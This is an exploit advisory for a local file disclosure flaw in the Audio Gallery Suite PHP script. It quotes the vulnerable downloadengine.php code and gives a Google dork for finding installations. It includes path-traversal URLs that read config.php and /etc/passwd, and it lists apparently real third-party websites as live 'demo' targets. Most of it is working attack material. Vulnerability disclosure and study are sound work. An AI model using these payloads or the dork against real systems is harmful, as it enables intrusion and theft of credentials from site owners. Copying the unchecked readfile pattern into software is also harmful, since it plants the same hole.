Audio Gallery Suite suffers from a local file disclosure vulnerability.
fd94107bb10f62bbac27b361b26a37489a5a4405fe9a91c38cb74b7b049e7b05
#######################################################
#
# [+] Exploit Title: Audio-Gallery-Suite Local File Disclosure Vulnerability
# [+] Google Dork: inurl:/downloadengine.php?file=
# [+] Date: July/04/2015
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Vendor Homepage: http://robinrizvi.info
# [+] Software Link: https://github.com/robinrizvi/Audio-Gallery-Suite
# [+] Version: All Version
# [+] Category: webapps
# [+] Platform: php
# [+] Tested on: Kali Linux
#
#######################################################
#
# [+] VULNERABILITY:
#
# LFD vulnerable File: downloadengine.php
#
# Code in downloadengine.php:
#
# <?php
# if (isset($_GET['file']))
# {
# $fullfilename=$_GET['file'];
# $filename=basename($fullfilename);
#
# //load the file
#
# readfile('../../../'.$fullfilename);
# }
# ?>
#
#######################################################
#
# [+] Exploit:
#
# http://localhost/media/player/php/downloadengine.php?file=[LFD]
#
#######################################################
#
# [+] Proof:
#
# http://localhost/media/player/php/downloadengine.php?file=media/player/php/downloadengine.php
#
# http://localhost/media/player/php/downloadengine.php?file=media/player/php/config.php
#
# http://localhost/media/player/php/downloadengine.php?file=../../../../../etc/passwd
#
#######################################################
#
# [+] Demo site:
#
# http://thisistohi.com/en/media/player/php/downloadengine.php?file=../../../../../etc/passwd
#
# http://www.rikhiapeeth.in/php/downloadengine.php?file=../index.php
#
#######################################################
#
# [+] Discovered By: Black.Hack3r
# [+] We Are: Black.Hack3r,M.R.S.CO,N3O,D$@d_M@n,HOt0N,KurD_HaCK3R
# [+] SpTnx: Mr.Cicili,Sec4ever,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
# [+] Home: http://wWw.IDC-TeaM.NeT
#
#######################################################